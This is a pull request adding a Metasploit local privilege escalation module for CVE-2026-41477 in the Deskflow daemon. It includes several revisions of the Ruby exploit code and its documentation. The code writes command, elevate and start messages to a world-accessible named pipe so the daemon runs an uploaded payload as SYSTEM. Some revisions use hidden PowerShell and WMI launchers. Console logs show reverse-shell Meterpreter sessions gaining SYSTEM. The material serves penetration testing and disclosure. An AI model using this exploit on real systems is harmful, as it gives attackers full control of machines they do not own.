### PR TITLE
Add CVE-2026-41477: Deskflow unauthenticated IPC named pipe LPE

### DIFF
--- a/documentation/modules/exploit/windows/local/deskflow_ipc_lpe.md
+++ b/documentation/modules/exploit/windows/local/deskflow_ipc_lpe.md
@@ -25,33 +25,67 @@ Affected versions:
 6. `run`
 7. A new Meterpreter session running as `NT AUTHORITY\SYSTEM` should open
 
-## Options
+## Notes
 
-### WaitTimeout (advanced)
-
-Number of seconds to wait for the SYSTEM session callback after triggering
-the named pipe. Default: `45`.
+It appears that every _other_ session generated is unstable.  If Cleanup deletes the file successfully,
+your session will die in a few seconds.  This appears to happen on even-numbered runs.
 
 ## Scenarios
 
-### Windows 10 22H2 x64, Deskflow v1.26.0.134
+### Windows 10 22H2 x64, Deskflow v1.20.0
 
 ```
-[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use windows/local/deskflow_ipc_lpe
-[*] Using configured payload windows/x64/meterpreter/reverse_tcp
-[msf](Jobs:0 Agents:1) exploit(windows/local/deskflow_ipc_lpe) >> set session 11
-session => 11
-[msf](Jobs:0 Agents:1) exploit(windows/local/deskflow_ipc_lpe) >> run
-[*] Started reverse TCP handler on 172.16.126.1:4444 
-[*] Uploading payload to C:\Users\katana\AppData\Local\Temp\9qPAnf67.exe...
-[*] Triggering escalation via deskflow-daemon named pipe...
-[*] Waiting 45s for SYSTEM session...
-[*] Sending stage (230982 bytes) to 172.16.126.135
-[+] SYSTEM session 12 opened
-[*] Meterpreter session 12 opened (172.16.126.1:4444 -> 172.16.126.135:1370) at 2026-04-23 06:04:16 +0100
+msf6 exploit(windows/local/deskflow_ipc_lpe) > sessions -C getuid
+[*] Running 'getuid' on meterpreter session 1 (10.5.134.104)
+Server username: WIN10_22H2_7FD2\msfuser
+msf6 exploit(windows/local/deskflow_ipc_lpe) > show options
 
-(Meterpreter 12)(C:\Windows\system32) > getuid
-Server username: NT AUTHORITY\SYSTEM
-(Meterpreter 12)(C:\Windows\system32) > 
+Module options (exploit/windows/local/deskflow_ipc_lpe):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                yes       The session to run this module on
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT     4578             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/local/deskflow_ipc_lpe) > run
+[*] Started reverse TCP handler on 10.5.135.201:4578 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Named pipe \.\pipe\deskflow-daemon is accessible
+[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\IHNQWx.exe...
+[*] Triggering escalation via deskflow-daemon named pipe...
+[*] Sending stage (203846 bytes) to 10.5.134.104
+[*] Waiting 45s for SYSTEM session...
+[*] Meterpreter session 17 opened (10.5.135.201:4578 -> 10.5.134.104:50783) at 2026-05-19 19:15:42 -0500
+[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\IHNQWx.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+meterpreter > sysinfo
+Computer        : WIN10_22H2_7FD2
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+
 
 ```

--- a/documentation/modules/exploit/windows/local/deskflow_ipc_lpe.md
+++ b/documentation/modules/exploit/windows/local/deskflow_ipc_lpe.md
@@ -1,0 +1,57 @@
+## Vulnerable Application
+
+Deskflow (formerly Synergy) is an open-source keyboard and mouse sharing
+application. The Deskflow daemon runs as `NT AUTHORITY\SYSTEM` and creates
+a named pipe `\\.\pipe\deskflow-daemon` with a world-accessible DACL
+(`WorldAccessOption` enabled).
+
+Any local unprivileged user can connect to the pipe and issue IPC commands
+without authentication. Sending `command=<path>`, `elevate=yes`, and `start`
+causes the daemon to execute the specified binary as `NT AUTHORITY\SYSTEM`.
+
+Affected versions:
+
+- Deskflow stable **v1.20.0**
+- Deskflow continuous build **v1.26.0.134**
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Obtain a Meterpreter session on the target as a normal (non-admin) user on
+   a machine running Deskflow
+3. `use exploit/windows/local/deskflow_ipc_lpe`
+4. `set SESSION <id>`
+5. `set LHOST <your IP>`
+6. `run`
+7. A new Meterpreter session running as `NT AUTHORITY\SYSTEM` should open
+
+## Options
+
+### WaitTimeout (advanced)
+
+Number of seconds to wait for the SYSTEM session callback after triggering
+the named pipe. Default: `45`.
+
+## Scenarios
+
+### Windows 10 22H2 x64, Deskflow v1.26.0.134
+
+```
+[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use windows/local/deskflow_ipc_lpe
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:1) exploit(windows/local/deskflow_ipc_lpe) >> set session 11
+session => 11
+[msf](Jobs:0 Agents:1) exploit(windows/local/deskflow_ipc_lpe) >> run
+[*] Started reverse TCP handler on 172.16.126.1:4444 
+[*] Uploading payload to C:\Users\katana\AppData\Local\Temp\9qPAnf67.exe...
+[*] Triggering escalation via deskflow-daemon named pipe...
+[*] Waiting 45s for SYSTEM session...
+[*] Sending stage (230982 bytes) to 172.16.126.135
+[+] SYSTEM session 12 opened
+[*] Meterpreter session 12 opened (172.16.126.1:4444 -> 172.16.126.135:1370) at 2026-04-23 06:04:16 +0100
+
+(Meterpreter 12)(C:\Windows\system32) > getuid
+Server username: NT AUTHORITY\SYSTEM
+(Meterpreter 12)(C:\Windows\system32) > 
+
+```

--- a/modules/exploits/windows/local/deskflow_ipc_lpe.rb
+++ b/modules/exploits/windows/local/deskflow_ipc_lpe.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_advanced_options([
       OptString.new('WritableDir', [true, 'Writable directory for payload', '%TEMP%']),
-      OptInt.new('WaitTimeout', [true, 'Seconds to wait for SYSTEM session callback', 30])
+      OptInt.new('WaitTimeout', [true, 'Seconds to wait for SYSTEM session callback', 45])
     ])
   end
 
@@ -89,8 +89,15 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(payload_path, generate_payload_exe)
     register_file_for_cleanup(payload_path)
 
+    launcher_name = "#{rand_text_alphanumeric(8)}.ps1"
+    launcher_path = "#{tmp_dir}\\#{launcher_name}"
+
+    print_status("Writing WMI launcher to #{launcher_path}...")
+    write_file(launcher_path, build_wmi_launcher(payload_path))
+    register_file_for_cleanup(launcher_path)
+
     print_status("Writing pipe trigger script to #{script_path}...")
-    write_file(script_path, build_pipe_script(payload_path))
+    write_file(script_path, build_pipe_script(launcher_path))
     register_file_for_cleanup(script_path)
 
     print_status('Triggering escalation via deskflow-daemon named pipe...')
@@ -98,20 +105,51 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Waiting #{datastore['WaitTimeout']}s for SYSTEM session...")
     deadline = Time.now + datastore['WaitTimeout'].to_i
-    sleep(2) until !framework.sessions.empty? || Time.now >= deadline
+    initial_sessions = framework.sessions.keys.dup
+    sleep(2) until (framework.sessions.keys - initial_sessions).any? || Time.now >= deadline
+
+    new_session_id = (framework.sessions.keys - initial_sessions).first
+    return unless new_session_id
+
+    print_good("SYSTEM session #{new_session_id} opened - sending stop to daemon")
+    stop_script_path = "#{tmp_dir}\\#{rand_text_alphanumeric(8)}.ps1"
+    write_file(stop_script_path, build_stop_script)
+    register_file_for_cleanup(stop_script_path)
+    cmd_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -File \"#{stop_script_path}\"", nil, 5)
   end
 
   private
+
+  def build_stop_script
+    <<~PS
+      $p = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'deskflow-daemon', [System.IO.Pipes.PipeDirection]::InOut)
+      $p.Connect(3000)
+      $b1 = [System.Text.Encoding]::ASCII.GetBytes("stop`n")
+      $b2 = [System.Text.Encoding]::ASCII.GetBytes("command=`n")
+      $p.Write($b1, 0, $b1.Length)
+      Start-Sleep -Milliseconds 500
+      $p.Write($b2, 0, $b2.Length)
+      $p.Close()
+    PS
+  end
 
   def expand_path(env_path)
     cmd_exec("powershell -NoP -NonI -C \"[System.Environment]::ExpandEnvironmentVariables('#{env_path}')\"").strip
   end
 
-  def build_pipe_script(exe_path)
+  def build_wmi_launcher(exe_path)
+    <<~PS
+      $wmi = [wmiclass]"\\\\.\\root\\cimv2:Win32_Process"
+      $wmi.Create("#{exe_path}")
+    PS
+  end
+
+  def build_pipe_script(launcher_path)
+    pipe_cmd = "powershell.exe -NonInteractive -WindowStyle Hidden -Exec Bypass -File #{launcher_path}"
     <<~PS
       $p = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'deskflow-daemon', [System.IO.Pipes.PipeDirection]::InOut)
       $p.Connect(5000)
-      $b1 = [System.Text.Encoding]::ASCII.GetBytes("command=#{exe_path}`n")
+      $b1 = [System.Text.Encoding]::ASCII.GetBytes("command=#{pipe_cmd}`n")
       $b2 = [System.Text.Encoding]::ASCII.GetBytes("elevate=yes`n")
       $b3 = [System.Text.Encoding]::ASCII.GetBytes("start`n")
       $b4 = [System.Text.Encoding]::ASCII.GetBytes("command=`n")

--- a/modules/exploits/windows/local/deskflow_ipc_lpe.rb
+++ b/modules/exploits/windows/local/deskflow_ipc_lpe.rb
@@ -9,6 +9,12 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  PIPE_NAME = '\\\\.\\pipe\\deskflow-daemon'.freeze
+  GENERIC_READ = 0x80000000
+  GENERIC_READ_WRITE = 0xC0000000
+  OPEN_EXISTING = 3
 
   def initialize(info = {})
     super(
@@ -17,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Deskflow Unauthenticated IPC Named Pipe Local Privilege Escalation',
         'Description' => %q{
           The Deskflow daemon runs as SYSTEM and exposes a named pipe
-          (\\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
+          (\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
           Any local unprivileged user can connect and send IPC commands
           without authentication. Sending command=<path>, elevate=yes,
           and start causes the daemon to execute an arbitrary binary as
@@ -26,20 +32,24 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Chokri Hammedi (blue0x1)'
+          'Chokri Hammedi (blue0x1)',
+          'Brendan Watters (bwatters-r7)'
         ],
         'References' => [
           ['CVE', '2026-41477'],
           ['GHSA', 'GHSA-6rx5-g478-775c']
         ],
         'Platform' => 'win',
-        'Arch' => [ARCH_X86, ARCH_X64],
-        'SessionTypes' => ['meterpreter'],
+        'Privileged' => true,
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => ['meterpreter'], # uses railgun
         'Targets' => [
-          ['Windows x64', { 'Arch' => ARCH_X64 }],
-          ['Windows x86', { 'Arch' => ARCH_X86 }]
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 45 # may take this long to get execution
+        },
         'DisclosureDate' => '2026-04-16',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -48,14 +58,10 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-
-    register_advanced_options([
-      OptInt.new('WaitTimeout', [true, 'Seconds to wait for SYSTEM session callback', 45])
-    ])
   end
 
   def check
-    h = pipe_open(0x80000000) # GENERIC_READ
+    h = pipe_open(GENERIC_READ) # GENERIC_READ
     return CheckCode::Safe('Named pipe deskflow-daemon not found') unless h
 
     session.railgun.kernel32.CloseHandle(h)
@@ -63,37 +69,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    fail_with(Failure::NotVulnerable, 'Pipe deskflow-daemon not found') unless begin
-      h = pipe_open(0x80000000)
-      session.railgun.kernel32.CloseHandle(h) if h
-      h
-    end
-
     tmp_dir = session.fs.file.expand_path('%TEMP%')
-    payload_path = "#{tmp_dir}\\#{rand_text_alphanumeric(8)}.exe"
+    payload_path = "#{tmp_dir}\\#{rand_text_alphanumeric(6..11)}.exe"
 
     print_status("Uploading payload to #{payload_path}...")
     write_file(payload_path, generate_payload_exe)
     register_file_for_cleanup(payload_path)
 
-    initial_sessions = framework.sessions.keys.dup
-
     print_status('Triggering escalation via deskflow-daemon named pipe...')
     trigger_pipe(payload_path)
 
-    print_status("Waiting #{datastore['WaitTimeout']}s for SYSTEM session...")
-    deadline = Time.now + datastore['WaitTimeout'].to_i
-    Rex::ThreadSafe.sleep(2) until (framework.sessions.keys - initial_sessions).any? || Time.now >= deadline
-
-    new_session_id = (framework.sessions.keys - initial_sessions).first
-    print_good("SYSTEM session #{new_session_id} opened") if new_session_id
+    print_status("Waiting #{datastore['WfsDelay']}s for SYSTEM session...")
   end
-
-  private
-
-  PIPE_NAME = '\\\\.\\pipe\\deskflow-daemon'
-  GENERIC_READ_WRITE = 0xC0000000
-  OPEN_EXISTING = 3
 
   def pipe_open(access)
     result = session.railgun.kernel32.CreateFileW(
@@ -122,8 +109,11 @@ class MetasploitModule < Msf::Exploit::Local
     rg = session.railgun
 
     ["command=#{exe_path}\n", "elevate=yes\n", "start\n"].each do |msg|
-      pipe_write(h, msg)
-      Rex::ThreadSafe.sleep(0.5)
+      write_retval = pipe_write(h, msg)
+      unless write_retval.include?('return') && write_retval['return'] == true
+        vprint_status("Railgun failed to write #{msg} to the pipe: #{write_retval}")
+      end
+      Rex::ThreadSafe.sleep(1)
     end
 
     rg.kernel32.CloseHandle(h)

--- a/modules/exploits/windows/local/deskflow_ipc_lpe.rb
+++ b/modules/exploits/windows/local/deskflow_ipc_lpe.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Deskflow Unauthenticated IPC Named Pipe Local Privilege Escalation',
         'Description' => %q{
           Deskflow daemon runs as SYSTEM and exposes a named pipe
-          (\\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
+          (\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
           Any local unprivileged user can connect and send privileged
           commands without authentication. By sending command=, elevate=yes,
           and start, an arbitrary executable is launched as NT AUTHORITY\SYSTEM.

--- a/modules/exploits/windows/local/deskflow_ipc_lpe.rb
+++ b/modules/exploits/windows/local/deskflow_ipc_lpe.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
-  include Msf::Post::Windows::Powershell
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -17,12 +16,13 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Deskflow Unauthenticated IPC Named Pipe Local Privilege Escalation',
         'Description' => %q{
-          Deskflow daemon runs as SYSTEM and exposes a named pipe
-          (\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
-          Any local unprivileged user can connect and send privileged
-          commands without authentication. By sending command=, elevate=yes,
-          and start, an arbitrary executable is launched as NT AUTHORITY\SYSTEM.
-          Affects stable v1.20.0 and continuous build v1.26.0.134.
+          The Deskflow daemon runs as SYSTEM and exposes a named pipe
+          (\\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
+          Any local unprivileged user can connect and send IPC commands
+          without authentication. Sending command=<path>, elevate=yes,
+          and start causes the daemon to execute an arbitrary binary as
+          NT AUTHORITY\SYSTEM. Affects stable v1.20.0 and continuous
+          build v1.26.0.134.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -34,20 +34,10 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'Platform' => 'win',
         'Arch' => [ARCH_X86, ARCH_X64],
-        'SessionTypes' => ['meterpreter', 'shell'],
+        'SessionTypes' => ['meterpreter'],
         'Targets' => [
-          [
-            'Windows x64',
-            {
-              'Arch' => ARCH_X64
-            }
-          ],
-          [
-            'Windows x86',
-            {
-              'Arch' => ARCH_X86
-            }
-          ]
+          ['Windows x64', { 'Arch' => ARCH_X64 }],
+          ['Windows x86', { 'Arch' => ARCH_X86 }]
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2026-04-16',
@@ -60,107 +50,82 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_advanced_options([
-      OptString.new('WritableDir', [true, 'Writable directory for payload', '%TEMP%']),
       OptInt.new('WaitTimeout', [true, 'Seconds to wait for SYSTEM session callback', 45])
     ])
   end
 
   def check
-    output = cmd_exec('powershell -NoP -NonI -C "[bool](Get-ChildItem \\\\.\\pipe\\ | Where-Object { $_.Name -eq \'deskflow-daemon\' })"')
+    h = pipe_open(0x80000000) # GENERIC_READ
+    return CheckCode::Safe('Named pipe deskflow-daemon not found') unless h
 
-    if output.strip.downcase == 'true'
-      CheckCode::Vulnerable('Named pipe \\.\pipe\deskflow-daemon is accessible')
-    else
-      CheckCode::Safe('Named pipe deskflow-daemon not found')
-    end
+    session.railgun.kernel32.CloseHandle(h)
+    CheckCode::Vulnerable('Named pipe \\.\pipe\deskflow-daemon is accessible')
   end
 
   def exploit
-    output = cmd_exec('powershell -NoP -NonI -C "[bool](Get-ChildItem \\\\.\\pipe\\ | Where-Object { $_.Name -eq \'deskflow-daemon\' })"')
-    fail_with(Failure::NotVulnerable, 'Pipe deskflow-daemon not found') unless output.strip.downcase == 'true'
+    fail_with(Failure::NotVulnerable, 'Pipe deskflow-daemon not found') unless begin
+      h = pipe_open(0x80000000)
+      session.railgun.kernel32.CloseHandle(h) if h
+      h
+    end
 
-    tmp_dir = expand_path('%TEMP%')
-    payload_name = "#{rand_text_alphanumeric(8)}.exe"
-    script_name = "#{rand_text_alphanumeric(8)}.ps1"
-    payload_path = "#{tmp_dir}\\#{payload_name}"
-    script_path = "#{tmp_dir}\\#{script_name}"
+    tmp_dir = session.fs.file.expand_path('%TEMP%')
+    payload_path = "#{tmp_dir}\\#{rand_text_alphanumeric(8)}.exe"
 
     print_status("Uploading payload to #{payload_path}...")
     write_file(payload_path, generate_payload_exe)
     register_file_for_cleanup(payload_path)
 
-    launcher_name = "#{rand_text_alphanumeric(8)}.ps1"
-    launcher_path = "#{tmp_dir}\\#{launcher_name}"
-
-    print_status("Writing WMI launcher to #{launcher_path}...")
-    write_file(launcher_path, build_wmi_launcher(payload_path))
-    register_file_for_cleanup(launcher_path)
-
-    print_status("Writing pipe trigger script to #{script_path}...")
-    write_file(script_path, build_pipe_script(launcher_path))
-    register_file_for_cleanup(script_path)
+    initial_sessions = framework.sessions.keys.dup
 
     print_status('Triggering escalation via deskflow-daemon named pipe...')
-    cmd_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -File \"#{script_path}\"", nil, 5)
+    trigger_pipe(payload_path)
 
     print_status("Waiting #{datastore['WaitTimeout']}s for SYSTEM session...")
     deadline = Time.now + datastore['WaitTimeout'].to_i
-    initial_sessions = framework.sessions.keys.dup
-    sleep(2) until (framework.sessions.keys - initial_sessions).any? || Time.now >= deadline
+    Rex::ThreadSafe.sleep(2) until (framework.sessions.keys - initial_sessions).any? || Time.now >= deadline
 
     new_session_id = (framework.sessions.keys - initial_sessions).first
-    return unless new_session_id
-
-    print_good("SYSTEM session #{new_session_id} opened - sending stop to daemon")
-    stop_script_path = "#{tmp_dir}\\#{rand_text_alphanumeric(8)}.ps1"
-    write_file(stop_script_path, build_stop_script)
-    register_file_for_cleanup(stop_script_path)
-    cmd_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -File \"#{stop_script_path}\"", nil, 5)
+    print_good("SYSTEM session #{new_session_id} opened") if new_session_id
   end
 
   private
 
-  def build_stop_script
-    <<~PS
-      $p = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'deskflow-daemon', [System.IO.Pipes.PipeDirection]::InOut)
-      $p.Connect(3000)
-      $b1 = [System.Text.Encoding]::ASCII.GetBytes("stop`n")
-      $b2 = [System.Text.Encoding]::ASCII.GetBytes("command=`n")
-      $p.Write($b1, 0, $b1.Length)
-      Start-Sleep -Milliseconds 500
-      $p.Write($b2, 0, $b2.Length)
-      $p.Close()
-    PS
+  PIPE_NAME = '\\\\.\\pipe\\deskflow-daemon'
+  GENERIC_READ_WRITE = 0xC0000000
+  OPEN_EXISTING = 3
+
+  def pipe_open(access)
+    result = session.railgun.kernel32.CreateFileW(
+      PIPE_NAME,
+      access,
+      0,
+      nil,
+      OPEN_EXISTING,
+      0,
+      0
+    )
+    h = result['return']
+    return nil if h.nil? || h == 0xFFFFFFFF || h == 0xFFFFFFFFFFFFFFFF || h.to_i < 0
+
+    h
   end
 
-  def expand_path(env_path)
-    cmd_exec("powershell -NoP -NonI -C \"[System.Environment]::ExpandEnvironmentVariables('#{env_path}')\"").strip
+  def pipe_write(handle, msg)
+    session.railgun.kernel32.WriteFile(handle, msg, msg.bytesize, 4, nil)
   end
 
-  def build_wmi_launcher(exe_path)
-    <<~PS
-      $wmi = [wmiclass]"\\\\.\\root\\cimv2:Win32_Process"
-      $wmi.Create("#{exe_path}")
-    PS
-  end
+  def trigger_pipe(exe_path)
+    h = pipe_open(GENERIC_READ_WRITE)
+    fail_with(Failure::Unreachable, 'Could not open deskflow-daemon named pipe') unless h
 
-  def build_pipe_script(launcher_path)
-    pipe_cmd = "powershell.exe -NonInteractive -WindowStyle Hidden -Exec Bypass -File #{launcher_path}"
-    <<~PS
-      $p = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'deskflow-daemon', [System.IO.Pipes.PipeDirection]::InOut)
-      $p.Connect(5000)
-      $b1 = [System.Text.Encoding]::ASCII.GetBytes("command=#{pipe_cmd}`n")
-      $b2 = [System.Text.Encoding]::ASCII.GetBytes("elevate=yes`n")
-      $b3 = [System.Text.Encoding]::ASCII.GetBytes("start`n")
-      $b4 = [System.Text.Encoding]::ASCII.GetBytes("command=`n")
-      $p.Write($b1, 0, $b1.Length)
-      Start-Sleep -Milliseconds 500
-      $p.Write($b2, 0, $b2.Length)
-      Start-Sleep -Milliseconds 500
-      $p.Write($b3, 0, $b3.Length)
-      Start-Sleep -Milliseconds 2000
-      $p.Write($b4, 0, $b4.Length)
-      $p.Close()
-    PS
+    rg = session.railgun
+
+    ["command=#{exe_path}\n", "elevate=yes\n", "start\n"].each do |msg|
+      pipe_write(h, msg)
+      Rex::ThreadSafe.sleep(0.5)
+    end
+
+    rg.kernel32.CloseHandle(h)
   end
 end

--- a/modules/exploits/windows/local/deskflow_ipc_lpe.rb
+++ b/modules/exploits/windows/local/deskflow_ipc_lpe.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Deskflow Unauthenticated IPC Named Pipe Local Privilege Escalation',
+        'Description' => %q{
+          Deskflow daemon runs as SYSTEM and exposes a named pipe
+          (\\.\pipe\deskflow-daemon) with WorldAccessOption enabled.
+          Any local unprivileged user can connect and send privileged
+          commands without authentication. By sending command=, elevate=yes,
+          and start, an arbitrary executable is launched as NT AUTHORITY\SYSTEM.
+          Affects stable v1.20.0 and continuous build v1.26.0.134.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Chokri Hammedi (blue0x1)'
+        ],
+        'References' => [
+          ['CVE', '2026-41477'],
+          ['GHSA', 'GHSA-6rx5-g478-775c']
+        ],
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Targets' => [
+          [
+            'Windows x64',
+            {
+              'Arch' => ARCH_X64
+            }
+          ],
+          [
+            'Windows x86',
+            {
+              'Arch' => ARCH_X86
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2026-04-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'Writable directory for payload', '%TEMP%']),
+      OptInt.new('WaitTimeout', [true, 'Seconds to wait for SYSTEM session callback', 30])
+    ])
+  end
+
+  def check
+    output = cmd_exec('powershell -NoP -NonI -C "[bool](Get-ChildItem \\\\.\\pipe\\ | Where-Object { $_.Name -eq \'deskflow-daemon\' })"')
+
+    if output.strip.downcase == 'true'
+      CheckCode::Vulnerable('Named pipe \\.\pipe\deskflow-daemon is accessible')
+    else
+      CheckCode::Safe('Named pipe deskflow-daemon not found')
+    end
+  end
+
+  def exploit
+    output = cmd_exec('powershell -NoP -NonI -C "[bool](Get-ChildItem \\\\.\\pipe\\ | Where-Object { $_.Name -eq \'deskflow-daemon\' })"')
+    fail_with(Failure::NotVulnerable, 'Pipe deskflow-daemon not found') unless output.strip.downcase == 'true'
+
+    tmp_dir = expand_path('%TEMP%')
+    payload_name = "#{rand_text_alphanumeric(8)}.exe"
+    script_name = "#{rand_text_alphanumeric(8)}.ps1"
+    payload_path = "#{tmp_dir}\\#{payload_name}"
+    script_path = "#{tmp_dir}\\#{script_name}"
+
+    print_status("Uploading payload to #{payload_path}...")
+    write_file(payload_path, generate_payload_exe)
+    register_file_for_cleanup(payload_path)
+
+    print_status("Writing pipe trigger script to #{script_path}...")
+    write_file(script_path, build_pipe_script(payload_path))
+    register_file_for_cleanup(script_path)
+
+    print_status('Triggering escalation via deskflow-daemon named pipe...')
+    cmd_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -File \"#{script_path}\"", nil, 5)
+
+    print_status("Waiting #{datastore['WaitTimeout']}s for SYSTEM session...")
+    deadline = Time.now + datastore['WaitTimeout'].to_i
+    sleep(2) until !framework.sessions.empty? || Time.now >= deadline
+  end
+
+  private
+
+  def expand_path(env_path)
+    cmd_exec("powershell -NoP -NonI -C \"[System.Environment]::ExpandEnvironmentVariables('#{env_path}')\"").strip
+  end
+
+  def build_pipe_script(exe_path)
+    <<~PS
+      $p = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'deskflow-daemon', [System.IO.Pipes.PipeDirection]::InOut)
+      $p.Connect(5000)
+      $b1 = [System.Text.Encoding]::ASCII.GetBytes("command=#{exe_path}`n")
+      $b2 = [System.Text.Encoding]::ASCII.GetBytes("elevate=yes`n")
+      $b3 = [System.Text.Encoding]::ASCII.GetBytes("start`n")
+      $b4 = [System.Text.Encoding]::ASCII.GetBytes("command=`n")
+      $p.Write($b1, 0, $b1.Length)
+      Start-Sleep -Milliseconds 500
+      $p.Write($b2, 0, $b2.Length)
+      Start-Sleep -Milliseconds 500
+      $p.Write($b3, 0, $b3.Length)
+      Start-Sleep -Milliseconds 2000
+      $p.Write($b4, 0, $b4.Length)
+      $p.Close()
+    PS
+  end
+end


### PR DESCRIPTION
  ## Summary
                                                                                                                                                                                              
  This module exploits CVE-2026-41477, an unauthenticated IPC vulnerability in the Deskflow daemon (formerly Synergy). The daemon runs as `NT AUTHORITY\SYSTEM` and exposes                   
  `\\.\pipe\deskflow-daemon` with a world-accessible DACL. Any local unprivileged user can connect and send `command=<path>`, `elevate=yes`, and `start` to execute an arbitrary binary as    
  SYSTEM without authentication.                                                                                                                                                              
                                                                                                                                                                                            
  **Affected versions:**
  - Deskflow stable v1.20.0
  - Deskflow continuous build v1.26.0.134                                                                                                                                                     
   
  ## Changes                                                                                                                                                                                  
                                                                                                                                                                                            
  - Named pipe communication implemented entirely via Railgun (`kernel32.CreateFileW`, `WriteFile`, `CloseHandle`) — no PowerShell or `cmd_exec` usage                                        
  - Temp path resolved with `session.fs.file.expand_path`                                                                                                                                   
  - `SessionTypes` restricted to `meterpreter` (required for Railgun)                                                                                                                         
  - Documentation added with verified scenario output                                                                                                                                       
                                                                                                                                                                                              
  ## Verification                                                                                                                                                                           
                                                                                                                                                                                              
  Tested on Windows 10 22H2 x64 with Deskflow v1.26.0.134:                                                                                                                                  

  [msf](Jobs:0 Agents:1) exploit(windows/local/deskflow_ipc_lpe) >> run                                                                                                                       
  [] Started reverse TCP handler on 172.16.126.1:4444 
  [] Uploading payload to C:\Users\katana\AppData\Local\Temp\9qPAnf67.exe...                                                                                                                  
  [] Triggering escalation via deskflow-daemon named pipe...                                                                                                                                  
  [] Waiting 45s for SYSTEM session...                                                                                                                                                        
  [] Sending stage (230982 bytes) to 172.16.126.135                                                                                                                                           
  [+] SYSTEM session 12 opened                                                                                                                                                                
  [] Meterpreter session 12 opened (172.16.126.1:4444 -> 172.16.126.135:1370)                                                                                                                 
                                                                                                                                                                                              
  (Meterpreter 12)(C:\Windows\system32) > getuid                                                                                                                                              
  Server username: NT AUTHORITY\SYSTEM                                                                                                                                                        
                                                                                                                                                                                              
  ## References                                                                                                                                                                             

  - CVE-2026-41477                                                                                                                                                                            
  - GHSA-6rx5-g478-775c
